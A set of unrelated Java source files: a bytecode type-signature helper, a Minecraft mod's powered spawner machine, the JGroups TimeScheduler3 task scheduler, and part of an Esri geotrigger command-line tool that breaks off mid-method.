parameters) { Preconditions.checkNotNull(type, "type is null"); return new ParameterizedType(type, parameters); } private final String type; private final String className; private final List<String> parameters; public ParameterizedType(String className) { Preconditions.checkNotNull(className, "className is null"); if (className.indexOf(".") > 0) { Preconditions.checkArgument(!className.endsWith(";"), "Invalid class name %s", className); } if (className.endsWith(";")) { Preconditions.checkArgument(!className.endsWith(";"), "Invalid class name %s", className); } this.className = className; this.type = "L" + className + ";"; this.parameters = ImmutableList.of(); } private ParameterizedType(Class<?> type) { Preconditions.checkNotNull(type, "type is null"); this.type = toInternalIdentifier(type); this.className = getPathName(type); this.parameters = ImmutableList.of(); } private ParameterizedType(Class<?> type, Class<?>... parameters) { Preconditions.checkNotNull(type, "type is null"); this.type = toInternalIdentifier(type); this.className = getPathName(type); ImmutableList.Builder<String> builder = ImmutableList.builder(); for (Class<?> parameter : parameters) { builder.add(toInternalIdentifier(parameter)); } this.parameters = builder.build(); } private ParameterizedType(Class<?> type, ParameterizedType... parameters) { Preconditions.checkNotNull(type, "type is null"); this.type = toInternalIdentifier(type); this.className = getPathName(type); ImmutableList.Builder<String> builder = ImmutableList.builder(); for (ParameterizedType parameter : parameters) { builder.add(parameter.toString()); } this.parameters = builder.build(); } public String getClassName() { return className; } public String getJavaClassName() { return className.replace('/', '.'); } public String getType() { return type; } public Type getAsmType() { return Type.getObjectType(className); } public String getGenericSignature() { final StringBuilder sb = new StringBuilder(); sb.append('L').append(className); if (!parameters.isEmpty()) { sb.append("<"); for (String parameterType : parameters) { sb.append(parameterType); } sb.append(">"); } sb.append(";"); return sb.toString(); } public boolean isGeneric() { return !parameters.isEmpty(); } @Override public boolean equals(Object o) { if (this == o) { return true; } if (o == null || getClass() != o.getClass()) { return false; } ParameterizedType that = (ParameterizedType) o; if (!type.equals(that.type)) { return false; } return true; } @Override public int hashCode() { return type.hashCode(); } @Override public String toString() { return getGenericSignature(); } public static String getPathName(Class<?> n) { return n.getName().replace('.', '/'); } private static String toInternalIdentifier(Class<?> n) { if (n.isArray()) { n = n.getComponentType(); if (n.isPrimitive()) { if (n == Byte.TYPE) { return "[B"; } else if (n == Boolean.TYPE) { return "[Z"; } else if (n == Short.TYPE) { return "[S"; } else if (n == Character.TYPE) { return "[C"; } else if (n == Integer.TYPE) { return "[I"; } else if (n == Float.TYPE) { return "[F"; } else if (n == Double.TYPE) { return "[D"; } else if (n == Long.TYPE) { return "[J"; } else { throw new RuntimeException("Unrecognized type in compiler: " + n.getName()); } } else { return "[" + toInternalIdentifier(n); } } else { if (n.isPrimitive()) { if (n == Byte.TYPE) { return "B"; } else if (n == Boolean.TYPE) { return "Z"; } else if (n == Short.TYPE) { return "S"; } else if (n == Character.TYPE) { return "C"; } else if (n == Integer.TYPE) { return "I"; } else if (n == Float.TYPE) { return "F"; } else if (n == Double.TYPE) { return "D"; } else if (n == Long.TYPE) { return "J"; } else if (n == Void.TYPE) { return "V"; } else { throw new RuntimeException("Unrecognized type in compiler: " + n.getName()); } } else { return "L" + getPathName(n) + ";"; } } } public static Predicate<ParameterizedType> isGenericType() { return new Predicate<ParameterizedType>() { @Override public boolean apply(ParameterizedType input) { return input.isGeneric(); } }; } public static Function<ParameterizedType, String> getParameterType() { return new Function<ParameterizedType, String>() { @Override public String apply(ParameterizedType input) { return input.getType(); } }; } public static Function<Class<?>, ParameterizedType> toParameterizedType() { return new Function<Class<?>, ParameterizedType>() { @Override public ParameterizedType apply(@Nullable Class<?> input) { return new ParameterizedType(input); } }; } public static Function<String, ParameterizedType> pathToParameterizedType() { return new Function<String, ParameterizedType>() { @Override public ParameterizedType apply(@Nullable String input) { return typeFromPathName(input); } }; } }
package crazypants.enderio.machine.spawner; import net.minecraft.entity.Entity; import net.minecraft.entity.EntityList; import net.minecraft.entity.EntityLiving; import net.minecraft.entity.EnumCreatureType; import net.minecraft.item.ItemStack; import net.minecraft.nbt.NBTTagCompound; import net.minecraft.util.AxisAlignedBB; import crazypants.enderio.EnderIO; import crazypants.enderio.ModObject; import crazypants.enderio.config.Config; import crazypants.enderio.machine.AbstractPoweredTaskEntity; import crazypants.enderio.machine.IMachineRecipe; import crazypants.enderio.machine.IPoweredTask; import crazypants.enderio.machine.PoweredTask; import crazypants.enderio.machine.SlotDefinition; import crazypants.enderio.power.BasicCapacitor; import crazypants.enderio.power.Capacitors; import crazypants.enderio.power.ICapacitor; public class TilePoweredSpawner extends AbstractPoweredTaskEntity { public static final int MIN_SPAWN_DELAY_BASE = Config.poweredSpawnerMinDelayTicks; public static final int MAX_SPAWN_DELAY_BASE = Config.poweredSpawnerMaxDelayTicks; public static final int POWER_PER_TICK_ONE = Config.poweredSpawnerLevelOnePowerPerTickRF; private static final BasicCapacitor CAP_ONE = new BasicCapacitor((int) (POWER_PER_TICK_ONE * 1.25), Capacitors.BASIC_CAPACITOR.capacitor.getMaxEnergyStored()); public static final int POWER_PER_TICK_TWO = Config.poweredSpawnerLevelTwoPowerPerTickRF; private static final BasicCapacitor CAP_TWO = new BasicCapacitor((int) (POWER_PER_TICK_TWO * 1.25), Capacitors.ACTIVATED_CAPACITOR.capacitor.getMaxEnergyStored()); public static final int POWER_PER_TICK_THREE = Config.poweredSpawnerLevelThreePowerPerTickRF; private static final BasicCapacitor CAP_THREE = new BasicCapacitor((int) (POWER_PER_TICK_THREE * 1.25), Capacitors.ENDER_CAPACITOR.capacitor.getMaxEnergyStored()); public static final int MIN_PLAYER_DISTANCE = Config.poweredSpawnerMaxPlayerDistance; public static final boolean USE_VANILLA_SPAWN_CHECKS = Config.poweredSpawnerUseVanillaSpawChecks; private static final String NULL_ENTITY_NAME = "None"; private String entityTypeName; private boolean isSpawnMode = true; private int powerUsePerTick; private int remainingSpawnTries; public TilePoweredSpawner() { super(new SlotDefinition(1, 1, 1)); entityTypeName = NULL_ENTITY_NAME; } public boolean isSpawnMode() { return isSpawnMode; } public void setSpawnMode(boolean isSpawnMode) { if(isSpawnMode != this.isSpawnMode) { currentTask = null; } this.isSpawnMode = isSpawnMode; } @Override protected void taskComplete() { super.taskComplete(); if(isSpawnMode) { remainingSpawnTries = Config.poweredSpawnerSpawnCount + Config.poweredSpawnerMaxSpawnTries; for (int i = 0; i < Config.poweredSpawnerSpawnCount && remainingSpawnTries > 0; ++i) { if(!trySpawnEntity()) { break; } } } else { if(getStackInSlot(0) == null || getStackInSlot(1) != null || !hasEntityName()) { return; } ItemStack res = EnderIO.itemSoulVessel.createVesselWithEntityStub(getEntityName()); decrStackSize(0, 1); setInventorySlotContents(1, res); } } @Override public void onCapacitorTypeChange() { ICapacitor refCap; int basePowerUse; switch (getCapacitorType()) { default: case BASIC_CAPACITOR: refCap = CAP_ONE; basePowerUse = POWER_PER_TICK_ONE; break; case ACTIVATED_CAPACITOR: refCap = CAP_TWO; basePowerUse = POWER_PER_TICK_TWO; break; case ENDER_CAPACITOR: refCap = CAP_THREE; basePowerUse = POWER_PER_TICK_THREE; break; } double multiplier = PoweredSpawnerConfig.getInstance().getCostMultiplierFor(getEntityName()); setCapacitor(new BasicCapacitor((int) (refCap.getMaxEnergyExtracted() * multiplier), refCap.getMaxEnergyStored())); powerUsePerTick = (int) Math.ceil(basePowerUse * multiplier); forceClientUpdate = true; } @Override public String getMachineName() { return ModObject.blockPoweredSpawner.unlocalisedName; } @Override protected boolean isMachineItemValidForSlot(int i, ItemStack itemstack) { if(itemstack == null || isSpawnMode) { return false; } if(slotDefinition.isInputSlot(i)) { return itemstack.getItem() == EnderIO.itemSoulVessel && !EnderIO.itemSoulVessel.containsSoul(itemstack); } return false; } @Override protected IMachineRecipe canStartNextTask(float chance) { if(!hasEntityName()) { return null; } if(isSpawnMode) { if(MIN_PLAYER_DISTANCE > 0) { if(worldObj.getClosestPlayer(xCoord + 0.5, yCoord + 0.5, zCoord + 0.5, MIN_PLAYER_DISTANCE) == null) { return null; } } } else { if(getStackInSlot(0) == null || getStackInSlot(1) != null) { return null; } } return new DummyRecipe(); } @Override protected boolean startNextTask(IMachineRecipe nextRecipe, float chance) { return super.startNextTask(nextRecipe, chance); } @Override public int getPowerUsePerTick() { return powerUsePerTick; } @Override protected boolean hasInputStacks() { return true; } @Override protected boolean canInsertResult(float chance, IMachineRecipe nextRecipe) { return true; } @Override public void readCommon(NBTTagCompound nbtRoot) { //Must read the mob type first so we know the multiplier to be used when calculating input/output power String mobType = BlockPoweredSpawner.readMobTypeFromNBT(nbtRoot); if(mobType == null) { mobType = NULL_ENTITY_NAME; } entityTypeName = mobType; if(!nbtRoot.hasKey("isSpawnMode")) { isSpawnMode = true; } else { isSpawnMode = nbtRoot.getBoolean("isSpawnMode"); } super.readCommon(nbtRoot); } @Override public void writeCommon(NBTTagCompound nbtRoot) { if(hasEntityName()) { BlockPoweredSpawner.writeMobTypeToNBT(nbtRoot, getEntityName()); } else { BlockPoweredSpawner.writeMobTypeToNBT(nbtRoot, null); } nbtRoot.setBoolean("isSpawnMode", isSpawnMode); super.writeCommon(nbtRoot); } @Override protected void updateEntityClient() { if(isActive()) { double x = xCoord + worldObj.rand.nextFloat(); double y = yCoord + worldObj.rand.nextFloat(); double z = zCoord + worldObj.rand.nextFloat(); worldObj.spawnParticle("smoke", x, y, z, 0.0D, 0.0D, 0.0D); worldObj.spawnParticle("flame", x, y, z, 0.0D, 0.0D, 0.0D); } super.updateEntityClient(); } @Override protected IPoweredTask createTask(IMachineRecipe nextRecipe, float chance) { PoweredTask res = new PoweredTask(nextRecipe, chance, getRecipeInputs()); int ticksDelay; if(isSpawnMode) { ticksDelay = TilePoweredSpawner.MIN_SPAWN_DELAY_BASE + (int) Math.round((TilePoweredSpawner.MAX_SPAWN_DELAY_BASE - TilePoweredSpawner.MIN_SPAWN_DELAY_BASE) * Math.random()); } else { ticksDelay = TilePoweredSpawner.MAX_SPAWN_DELAY_BASE - ((TilePoweredSpawner.MAX_SPAWN_DELAY_BASE - TilePoweredSpawner.MIN_SPAWN_DELAY_BASE) / 2); } if(getCapacitorType().ordinal() == 1) { ticksDelay /= 2; } else if(getCapacitorType().ordinal() == 2) { ticksDelay /= 4; } int powerPerTick = getPowerUsePerTick(); res.setRequiredEnergy(powerPerTick * ticksDelay); return res; } protected boolean canSpawnEntity(EntityLiving entityliving) { boolean spaceClear = worldObj.checkNoEntityCollision(entityliving.boundingBox) && worldObj.getCollidingBoundingBoxes(entityliving, entityliving.boundingBox).isEmpty() && (!worldObj.isAnyLiquid(entityliving.boundingBox) || entityliving.isCreatureType(EnumCreatureType.waterCreature, false)); if(spaceClear && USE_VANILLA_SPAWN_CHECKS) { //Full checks for lighting, dimension etc spaceClear = entityliving.getCanSpawnHere(); } return spaceClear; } Entity createEntity(boolean forceAlive) { Entity ent = EntityList.createEntityByName(getEntityName(), worldObj); if(forceAlive && MIN_PLAYER_DISTANCE <= 0 && Config.poweredSpawnerDespawnTimeSeconds > 0 && ent instanceof EntityLiving) { ent.getEntityData().setLong(BlockPoweredSpawner.KEY_SPAWNED_BY_POWERED_SPAWNER, worldObj.getTotalWorldTime()); ((EntityLiving) ent).func_110163_bv(); } return ent; } protected boolean trySpawnEntity() { Entity entity = createEntity(true); if(!(entity instanceof EntityLiving)) { return false; } EntityLiving entityliving = (EntityLiving) entity; int spawnRange = Config.poweredSpawnerSpawnRange; if(Config.poweredSpawnerMaxNearbyEntities > 0) { int nearbyEntities = worldObj.getEntitiesWithinAABB( entity.getClass(), AxisAlignedBB.getBoundingBox( xCoord - spawnRange*2, yCoord - 4, zCoord - spawnRange*2, xCoord + spawnRange*2, yCoord + 4, zCoord + spawnRange*2)).size(); if(nearbyEntities >= Config.poweredSpawnerMaxNearbyEntities) { return false; } } while(remainingSpawnTries-- > 0) { double x = xCoord + (worldObj.rand.nextDouble() - worldObj.rand.nextDouble()) * spawnRange; double y = yCoord + worldObj.rand.nextInt(3) - 1; double z = zCoord + (worldObj.rand.nextDouble() - worldObj.rand.nextDouble()) * spawnRange; entity.setLocationAndAngles(x, y, z, worldObj.rand.nextFloat() * 360.0F, 0.0F); if(canSpawnEntity(entityliving)) { entityliving.onSpawnWithEgg(null); worldObj.spawnEntityInWorld(entityliving); worldObj.playAuxSFX(2004, xCoord, yCoord, zCoord, 0); entityliving.spawnExplosionParticle(); return true; } } return false; } public String getEntityName() { return entityTypeName; } public boolean hasEntityName() { return !NULL_ENTITY_NAME.equals(entityTypeName); } }
package org.jgroups.util; import org.jgroups.Global; import org.jgroups.logging.Log; import org.jgroups.logging.LogFactory; import java.util.List; import java.util.concurrent.*; /** * Implementation of {@link TimeScheduler}. Based on the {@link TimeScheduler2} implementation * with various fixes and enhancements. Uses a {@link DelayQueue} to order tasks according to execution times * @author Bela Ban * @since 3.3 */ public class TimeScheduler3 implements TimeScheduler, Runnable { /** Thread pool used to execute the tasks */ protected final ThreadPoolExecutor pool; /** DelayQueue with tasks being sorted according to execution times (next execution first) */ protected final BlockingQueue<Task> queue=new DelayQueue<Task>(); /** Thread which removes tasks ready to be executed from the queue and submits them to the pool for execution */ protected volatile Thread runner; protected static final Log log=LogFactory.getLog(TimeScheduler3.class); protected ThreadFactory timer_thread_factory=null; protected static enum TaskType {dynamic, fixed_rate, fixed_delay} /** * Create a scheduler that executes tasks in dynamically adjustable intervals */ public TimeScheduler3() { pool=new ThreadPoolExecutor(4, 10, 5000, TimeUnit.MILLISECONDS, new LinkedBlockingQueue<Runnable>(5000), Executors.defaultThreadFactory(), new ThreadPoolExecutor.CallerRunsPolicy()); start(); } public TimeScheduler3(ThreadFactory factory, int min_threads, int max_threads, long keep_alive_time, int max_queue_size, String rejection_policy) { timer_thread_factory=factory; pool=new ThreadPoolExecutor(min_threads, max_threads,keep_alive_time, TimeUnit.MILLISECONDS, new LinkedBlockingQueue<Runnable>(max_queue_size), factory, Util.parseRejectionPolicy(rejection_policy)); start(); } public void setThreadFactory(ThreadFactory f) {pool.setThreadFactory(f);} public int getMinThreads() {return pool.getCorePoolSize();} public void setMinThreads(int size) {pool.setCorePoolSize(size);} public int getMaxThreads() {return pool.getMaximumPoolSize();} public void setMaxThreads(int size) {pool.setMaximumPoolSize(size);} public long getKeepAliveTime() {return pool.getKeepAliveTime(TimeUnit.MILLISECONDS);} public void setKeepAliveTime(long time) {pool.setKeepAliveTime(time, TimeUnit.MILLISECONDS);} public int getCurrentThreads() {return pool.getPoolSize();} public int getQueueSize() {return pool.getQueue().size();} public int size() {return queue.size();} public String toString() {return getClass().getSimpleName();} public boolean isShutdown() {return pool.isShutdown();} public String dumpTimerTasks() { StringBuilder sb=new StringBuilder(); for(Task task: queue) { sb.append(task); if(task.isCancelled()) sb.append(" (cancelled)"); sb.append("\n"); } return sb.toString(); } public void execute(Runnable task) { submitToPool(task instanceof TimeScheduler.Task? new RecurringTask(task, TaskType.dynamic, 0, ((TimeScheduler.Task)task).nextInterval(), TimeUnit.MILLISECONDS) : new Task(task)); // we'll execute the task directly } public Future<?> schedule(Runnable work, long initial_delay, TimeUnit unit) { return doSchedule(new Task(work, initial_delay, unit), initial_delay); } public Future<?> scheduleWithFixedDelay(Runnable work, long initial_delay, long delay, TimeUnit unit) { return scheduleRecurring(work, TaskType.fixed_delay, initial_delay, delay, unit); } public Future<?> scheduleAtFixedRate(Runnable work, long initial_delay, long delay, TimeUnit unit) { return scheduleRecurring(work,TaskType.fixed_rate,initial_delay,delay,unit); } /** * Schedule a task for execution at varying intervals. After execution, the task will get rescheduled after * {@link org.jgroups.util.TimeScheduler.Task#nextInterval()} milliseconds. The task is never done until * nextInterval() returns a value <= 0 or the task is cancelled.<p/> * Note that the task is rescheduled relative to the last time is actually executed. This is similar to * {@link #scheduleWithFixedDelay(Runnable,long,long,java.util.concurrent.TimeUnit)}. * @param work the task to execute */ public Future<?> scheduleWithDynamicInterval(TimeScheduler.Task work) { return scheduleRecurring(work, TaskType.dynamic, work.nextInterval(), 0, TimeUnit.MILLISECONDS); } protected void start() { startRunner(); } /** * Stops the timer, cancelling all tasks */ public void stop() { stopRunner(); // we may need to do multiple iterations as the iterator works on a copy and tasks might have been added just // after the iterator() call returned while(!queue.isEmpty()) for(Task entry: queue) { entry.cancel(true); queue.remove(entry); } queue.clear(); List<Runnable> remaining_tasks=pool.shutdownNow(); for(Runnable task: remaining_tasks) { if(task instanceof Future) { Future future=(Future)task; future.cancel(true); } } pool.getQueue().clear(); try { pool.awaitTermination(Global.THREADPOOL_SHUTDOWN_WAIT_TIME, TimeUnit.MILLISECONDS); } catch(InterruptedException e) { } } public void run() { while(Thread.currentThread() == runner) { try { final Task entry=queue.take(); submitToPool(entry); } catch(InterruptedException interrupted) { // flag is cleared and we check if the loop should be terminated at the top of the loop } catch(Throwable t) { log.error("failed submitting task to thread pool", t); } } } protected Future<?> scheduleRecurring(Runnable work, TaskType type, long initial_delay, long delay, TimeUnit unit) { return doSchedule(new RecurringTask(work, type, initial_delay, delay, unit), initial_delay); } protected Future<?> doSchedule(Task task, long initial_delay) { if(task.getRunnable() == null) throw new NullPointerException(); if (isShutdown()) return null; if(initial_delay <= 0) { submitToPool(task); return task; } return add(task); } protected void submitToPool(final Task entry) { try { pool.execute(entry); } catch(RejectedExecutionException rejected) { // only thrown if rejection policy is "abort" Thread thread=timer_thread_factory != null? timer_thread_factory.newThread(entry, "Timer temp thread") : new Thread(entry, "Timer temp thread"); thread.start(); } } protected Task add(Task task) { if(!isRunning()) return null; queue.add(task); return task; } protected boolean isRunning() { Thread tmp=runner; return tmp != null && tmp.isAlive(); } protected synchronized void startRunner() { stopRunner(); runner=timer_thread_factory != null? timer_thread_factory.newThread(this, "Timer runner") : new Thread(this, "Timer runner"); runner.start(); } protected synchronized void stopRunner() { Thread tmp=runner; runner=null; if(tmp != null) { tmp.interrupt(); try {tmp.join(500);} catch(InterruptedException e) {} } queue.clear(); } public static class Task implements Runnable, Delayed, Future { protected final Runnable runnable; // the task to execute protected long creation_time; // time (in ns) at which the task was created protected long delay; // time (in ns) after which the task should execute protected volatile boolean cancelled; protected volatile boolean done; public Task(Runnable runnable) { this.runnable=runnable; } public Task(Runnable runnable, long initial_delay, TimeUnit unit) { this.creation_time=System.nanoTime(); this.delay=TimeUnit.NANOSECONDS.convert(initial_delay, unit); this.runnable=runnable; if(runnable == null) throw new IllegalArgumentException("runnable cannot be null"); } public Runnable getRunnable() {return runnable;} public int compareTo(Delayed o) { long my_delay=getDelay(TimeUnit.NANOSECONDS), other_delay=o.getDelay(TimeUnit.NANOSECONDS); return Long.compare(my_delay, other_delay); } public long getDelay(TimeUnit unit) { // time (in ns) until execution, can be negative when already elapsed long remaining_time=delay - (System.nanoTime() - creation_time); return unit.convert(remaining_time, TimeUnit.NANOSECONDS); } public boolean cancel(boolean mayInterruptIfRunning) { boolean retval=!isDone(); cancelled=true; return retval; } public boolean isCancelled() {return cancelled;} public boolean isDone() {return done || cancelled;} public Object get() throws InterruptedException, ExecutionException {return null;} public Object get(long timeout, TimeUnit unit) throws InterruptedException, ExecutionException, TimeoutException { return null; } public void run() { if(isDone()) return; try { runnable.run(); } catch(Throwable t) { log.error("failed executing task " + runnable, t); } finally { done=true; } } public String toString() { return runnable.toString(); } } /** Tasks which runs more than once, either dynamic, fixed-rate or fixed-delay, until cancelled */ protected class RecurringTask extends Task { protected final TaskType type; protected final long period; // ns protected final long initial_delay; // ns protected int cnt=1; // number of invocations (for fixed rate invocations) public RecurringTask(Runnable runnable, TaskType type, long initial_delay, long delay, TimeUnit unit) { super(runnable, initial_delay, unit); this.initial_delay=TimeUnit.NANOSECONDS.convert(initial_delay, TimeUnit.MILLISECONDS); this.type=type; period=TimeUnit.NANOSECONDS.convert(delay, unit); if(type == TaskType.dynamic && !(runnable instanceof TimeScheduler.Task)) throw new IllegalArgumentException("Need to provide a TimeScheduler.Task as runnable when type is dynamic"); } public void run() { if(isDone()) return; super.run(); if(cancelled) return; done=false; // run again switch(type) { case dynamic: long next_interval=TimeUnit.NANOSECONDS.convert(((TimeScheduler.Task)runnable).nextInterval(), TimeUnit.MILLISECONDS); if(next_interval <= 0) { if(log.isTraceEnabled()) log.trace("task will not get rescheduled as interval is " + next_interval); done=true; return; } creation_time=System.nanoTime(); delay=next_interval; break; case fixed_rate: delay=initial_delay + cnt++ * period; break; case fixed_delay: creation_time=System.nanoTime(); delay=period; break; } add(this); // schedule this task again } } }
package de.esri.geotrigger.core; import java.io.File; import java.util.List; import java.util.Map; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.json.JSONException; import org.json.JSONObject; import de.esri.geotrigger.config.Arcgis; import de.esri.geotrigger.config.Configuration; import de.esri.geotrigger.config.ConfigurationReader; import de.esri.geotrigger.config.Notification; import de.esri.geotrigger.config.Query; import de.esri.geotrigger.config.ReaderException; import de.esri.geotrigger.config.Trigger; /** * Command line tool to create triggers and perform other geotrigger tasks. */ public class Geotrigger { private static Logger log = LogManager.getLogger(Geotrigger.class.getName()); public static final String TRIGGER_ID = "triggerid"; public static final String TRIGGER_IDS = "triggerids"; public static final String DEVICE_IDS = "deviceids"; public static final String TAGS = "tags"; public static final String DIRECTION = "direction"; public static final String LATITUDE = "latitude"; public static final String LONGITUDE = "longitude"; public static final String RADIUS = "radius"; public static final String GEOJSON = "geojson"; public static final String NOTIFICATION_TEXT = "notificationtext"; public static final String NOTIFICATION_URL = "notificationurl"; public static final String NOTIFICATION_ICON = "notificationicon"; public static final String NOTIFICATION_SOUND = "notificationsound"; public static final String NOTIFICATION_DATA = "notificationdata"; public static final String CALLBACK_URL = "callbackurl"; public static final String PROPERTIES = "properties"; public static final String TRACKING_PROFILE = "trackingprofile"; public static final String TIMES = "times"; public static final String RATE_LIMIT = "ratelimit"; public static final String BOUNDINGBOX_RETURN_FORMAT = "bboxreturnformat"; public static final String GEO_RETURN_FORMAT = "times"; public static final String FROM_TIMESTAMP = "fromtimestamp"; public static final String TO_TIMESTAMP = "totimestamp"; public static final String CLIENTID = "clientid"; public static final String CLIENTSECRET = "clientsecret"; public static final String CONFIGFILE = "configfile"; public static void main(String[] args) { CommandLineArgs commandLineArgs = new CommandLineArgs(args); switch(commandLineArgs.getCommand()){ case CommandLineArgs.HELP: // write help break; case CommandLineArgs.CREATE_TRIGGER: // create Trigger createTrigger(commandLineArgs.getParameters()); break; case CommandLineArgs.CREATE_TRIGGER_FROM_SERVICE: // create Trigger from feature service createTriggerFromService(commandLineArgs.getParameters()); break; case CommandLineArgs.RUN_TRIGGER: // run Trigger runTrigger(commandLineArgs.getParameters()); break; case CommandLineArgs.DELETE_TRIGGERS: // delete Trigger deleteTriggers(commandLineArgs.getParameters()); break; case CommandLineArgs.DELETE_TAGS: // delete tags deleteTags(commandLineArgs.getParameters()); break; } } /** * Create a geotrigger. * @param params The parameters for the trigger. */ private static void createTrigger(Map<String, String> params){ log.info("Creating trigger..."); String triggerId = params.containsKey(TRIGGER_ID) ? params.get(TRIGGER_ID) : null; String tagStr = params.containsKey(TAGS) ? params.get(TAGS) : null; String[] tags = tagStr.split(","); String direction = params.containsKey(DIRECTION) ? params.get(DIRECTION) : null; String latitudeStr = params.containsKey(LATITUDE) ? params.get(LATITUDE) : null; double latitude = 0.0; try{ latitude = Double.parseDouble(latitudeStr); }catch(Exception ex){ log.error("Error parsing latitude value: "+ex.getMessage()); } String longitudeStr = params.containsKey(LONGITUDE) ? params.get(LONGITUDE) : null; double longitude = 0.0; try{ longitude = Double.parseDouble(longitudeStr); }catch(Exception ex){ log.error("Error parsing longitude value: "+ex.getMessage()); } String radiusStr = params.containsKey(RADIUS) ? params.get(RADIUS) : null; double radius = 0.0; try{ radius = Double.parseDouble(radiusStr); }catch(Exception ex){ log.error("Error parsing radius value: "+ex.getMessage()); } String geoJson = params.containsKey(GEOJSON) ? params.get(GEOJSON) : null; String notificationText = params.containsKey(NOTIFICATION_TEXT) ? params.get(NOTIFICATION_TEXT) : null; String notificationUrl = params.containsKey(NOTIFICATION_URL) ? params.get(NOTIFICATION_URL) : null; String notificationIcon = params.containsKey(NOTIFICATION_ICON) ? params.get(NOTIFICATION_ICON) : null; String notificationSound = params.containsKey(NOTIFICATION_SOUND) ? params.get(NOTIFICATION_SOUND) : null; String notificationData = params.containsKey(NOTIFICATION_DATA) ? params.get(NOTIFICATION_DATA) : null; String callBackUrl = params.containsKey(CALLBACK_URL) ? params.get(CALLBACK_URL) : null; String properties = params.containsKey(PROPERTIES) ? params.get(PROPERTIES) : null; String trackingProfile = params.containsKey(TRACKING_PROFILE) ? params.get(TRACKING_PROFILE) : null; String timesStr = params.containsKey(TIMES) ? params.get(TIMES) : null; int times = 0; if(timesStr != null){ try{ times = Integer.parseInt(timesStr); }catch(Exception ex){ log.error("Error parsing times value: "+ex.getMessage()); } } String rateLimitStr = params.containsKey(RATE_LIMIT) ? params.get(RATE_LIMIT) : null; int rateLimit = 0; if(rateLimitStr != null){ try{ rateLimit = Integer.parseInt(rateLimitStr); }catch(Exception ex){ log.error("Error parsing rate limit value: "+ex.getMessage()); } } String boundingBoxReturnFormat = params.containsKey(BOUNDINGBOX_RETURN_FORMAT) ? params.get(BOUNDINGBOX_RETURN_FORMAT) : null; String geoReturnFormat = params.containsKey(GEO_RETURN_FORMAT) ? params.get(GEO_RETURN_FORMAT) : null; String fromTimestampStr = params.containsKey(FROM_TIMESTAMP) ? params.get(FROM_TIMESTAMP) : null; long fromTimestamp = 0; if(fromTimestampStr != null){ try{ fromTimestamp = Long.parseLong(fromTimestampStr); }catch(Exception ex){ log.error("Error parsing from timestamp value: "+ex.getMessage()); } } String toTimestampStr = params.containsKey(TO_TIMESTAMP) ? params.get(TO_TIMESTAMP) : null; long toTimestamp = 0; if(toTimestampStr != null){ try{ toTimestamp = Long.parseLong(toTimestampStr); }catch(Exception ex){ log.error("Error parsing from timestamp value: "+ex.getMessage()); } } String clientId = params.containsKey(CLIENTID) ? params.get(CLIENTID) : null; String clientSecret = params.containsKey(CLIENTSECRET) ? params.get(CLIENTSECRET) : null; if(Util.isEmpty(clientId)){ log.error("Client ID not set."); }else{ if(Util.isEmpty(clientSecret)){ log.error("Client secret not set."); }else{ setAppId(clientId, clientSecret); TriggerHandler handler = new TriggerHandler(); if(latitudeStr != null && longitudeStr != null && radiusStr != null){ handler.createTrigger(triggerId, tags, direction, latitude, longitude, radius, notificationText, notificationUrl, notificationIcon, notificationSound, notificationData, callBackUrl, properties, trackingProfile, times, rateLimit, boundingBoxReturnFormat, geoReturnFormat, fromTimestamp, toTimestamp); }else if(geoJson != null){ handler.createTrigger(triggerId, tags, direction, geoJson, notificationText, notificationUrl, notificationIcon, notificationSound, notificationData, callBackUrl, properties, trackingProfile, times, rateLimit, boundingBoxReturnFormat, geoReturnFormat, fromTimestamp, toTimestamp); } } } } /** * Create geotriggers from a feature service. * @param params The parameters for the trigger. */ private static void createTriggerFromService(Map<String, String> params){ log.info("Creating triggers from service..."); String configXml = params.containsKey(CONFIGFILE) ? params.get(CONFIGFILE) : null; log.debug("Config file: "+configXml); if(!Util.isEmpty(configXml)){ File configFile = new File(configXml); if(configFile.exists()){ ConfigurationReader reader = new ConfigurationReader(configFile); try { Configuration configuration = reader.read(); // delete the old triggers deleteTriggers(configuration); // create new triggers generateTriggers(configuration); } catch (ReaderException e) { log.error("Error parsing configuration file: " + e.getMessage()); } }else{ log.error("The configuration file does not exist."); } } } /** * Delete old triggers by the specified tags. */ private static void deleteTriggers(Configuration configuration){ List<Query> queries = configuration.getQuery(); for(Query query : queries){ Arcgis arcgis = query.getArcgis(); String clientId = arcgis.getApp().getClientId(); String clientSecret = arcgis.getApp().getClientSecret(); setAppId(clientId, clientSecret); Trigger trigger = query.getTrigger(); String tagStr = trigger.getTags(); String[] tags = tagStr.split(","); TriggerHandler triggerHandler = new TriggerHandler(); triggerHandler.deleteTriggersByTags(tags); } } /** * Generate triggers for the features in the services as defined in the configuration. */ public static void generateTriggers(Configuration configuration){ List<Query> queries = configuration.getQuery(); for(Query query : queries){ Arcgis arcgis = query.getArcgis(); String featureServiceUrl = arcgis.getFeatureClass(); String user = arcgis.getLogin().getUser(); String password = arcgis.getLogin().getPassword(); String clientId = arcgis.getApp().getClientId(); String clientSecret = arcgis.getApp().getClientSecret(); setAppId(clientId, clientSecret); Trigger trigger = query.getTrigger(); String triggerId = trigger.getTriggerID(); String tagStr = trigger.getTags(); String[] tags = tagStr.split(","); String direction = trigger.getDirection(); float radius = trigger.getRadius(); Notification notification = trigger.getNotification(); String notificationText = notification.getText(); String notificationUrl = notification.getUrl(); String notificationData = notification.getData(); String where = trigger.getWhere(); TriggerHandler triggerHandler = new TriggerHandler(); triggerHandler.createTriggersFromService(featureServiceUrl, user, password, triggerId, tags, direction, radius, notificationText, notificationUrl, notificationData, where); } } /** * Delete triggers by tags. * @param params The parameters for the triggers. */ private static void deleteTriggers(Map<String, String> params){ log.info("Deleating trigger..."); String tagStr = params.containsKey(TAGS) ? params.get(TAGS) : null; String[] tags = tagStr.split(","); String clientId = params.containsKey(CLIENTID) ? params.get(CLIENTID) : null; String clientSecret = params.containsKey(CLIENTSECRET) ? params.get(CLIENTSECRET) : null; if(Util.isEmpty(clientId)){ log.error("Client ID not set."); }else{ if(Util.isEmpty(clientSecret)){ log.error("Client secret not set."); }else{ setAppId(clientId, clientSecret); TriggerHandler handler = new TriggerHandler(); handler.deleteTriggersByTags(tags); } } } /** * Run a trigger. * @param params The parameters for the trigger. */ private static void runTrigger(Map<String, String> params){ log.info("Run trigger..."); String triggerIdsStr = params.containsKey(TRIGGER_IDS) ? params.get(TRIGGER_IDS) : null; String[] triggerIds = triggerIdsStr.split(","); String deviceIdsStr = params.containsKey(DEVICE_IDS) ? params.get(DEVICE_IDS) : null; String[] deviceIds = deviceIdsStr.split(","); String clientId = params.containsKey(CLIENTID) ? params.get(CLIENTID) : 